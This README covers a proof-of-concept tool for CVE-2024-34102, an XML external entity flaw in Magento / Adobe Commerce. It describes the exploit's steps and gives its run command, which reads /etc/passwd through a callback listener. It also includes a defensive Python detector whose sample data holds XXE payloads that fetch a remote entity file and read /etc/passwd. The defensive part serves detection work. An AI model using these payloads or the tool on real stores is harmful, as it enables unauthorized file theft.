POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.
This POC will attempt to read files from target hosts that are vulnerable to the recent Magento / Adobe Commerce CVE-2024-34102. This POC is based on this security advisory and this research by Assetnote.
To run this POC, you need a machine with a public, reachable IP address.
- Creates a local file `poc.xml` containing the main payloads.
- Sends the payload to the target via a POST request.
- Sets up a listener on your machine for incoming GET requests from the target.
- Attempts to read files from the target (default: `/etc/passwd`).
- Python 3.6 or higher
- `requests` library
To use this POC against a single target:
```
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)
```
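For defenders, the sequence this POC follows (an XML POST to the target, then GET requests from the target back to a listener) leaves two log trails that can be correlated. The sketch below is an added example, not part of this POC: it flags POST bodies that declare external entities and checks whether the server also connected out to a host named in the declaration. The record fields (`id`, `method`, `body`, `dst`) and all sample data are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlparse

# DOCTYPE or ENTITY declaration (general or parameter) naming an external identifier.
EXTERNAL_DECL = re.compile(
    r"<!(?:ENTITY\s+(?:%\s+)?[\w.:-]+|DOCTYPE\s+[\w.:-]+)\s+(?:SYSTEM|PUBLIC)\s"
    r"[^>]*?[\"']([^\"']+)[\"']\s*[>\[]",
    re.IGNORECASE,
)

def external_refs(body):
    """External identifiers declared in a body, checked raw and URL-decoded."""
    refs = []
    for text in dict.fromkeys((body, unquote_plus(body))):
        refs += [m.group(1) for m in EXTERNAL_DECL.finditer(text)]
    return list(dict.fromkeys(refs))  # de-duplicate, keep order

def correlate(requests_log, egress_log):
    """Flag POSTs that declare external entities and note whether the web
    tier also connected out to a host named in the declaration."""
    egress_hosts = {e["dst"] for e in egress_log}
    findings = []
    for req in requests_log:
        if req["method"] != "POST":
            continue
        refs = external_refs(req["body"])
        if refs:
            # file: identifiers have no hostname, so they never match egress
            hosts = {urlparse(r).hostname for r in refs} - {None}
            findings.append({"id": req["id"], "refs": refs,
                             "callback_seen": bool(hosts & egress_hosts)})
    return findings

# Constructed sample data (documentation addresses, not real traffic).
REQUESTS = [
    {"id": 1, "method": "POST", "body": '<?xml version="1.0"?><order><sku>A1</sku></order>'},
    {"id": 2, "method": "POST", "body": '<!DOCTYPE r [<!ENTITY % ext SYSTEM '
                                        '"http://203.0.113.7:8000/poc.xml"> %ext;]><r/>'},
    {"id": 3, "method": "POST", "body": "%3C%21DOCTYPE%20r%20%5B%3C%21entity%20x%20system%20"
                                        "%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cr%2F%3E"},
    {"id": 4, "method": "GET", "body": ""},
]
EGRESS = [{"src": "10.0.0.5", "dst": "203.0.113.7", "port": 8000}]

if __name__ == "__main__":
    for finding in correlate(REQUESTS, EGRESS):
        print(finding)
```

A finding with `callback_seen` set means the server fetched the external resource, which is the stage at which file contents can leave the host.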
For any suggestions or thoughts, please get in touch with me.
This provided tool is for educational purposes only. I do not encourage, condone, or support unauthorized access to any system or network. Use this tool responsibly and only on systems you have explicit permission to test. Any actions and consequences resulting from misuse of this tool are your own responsibility.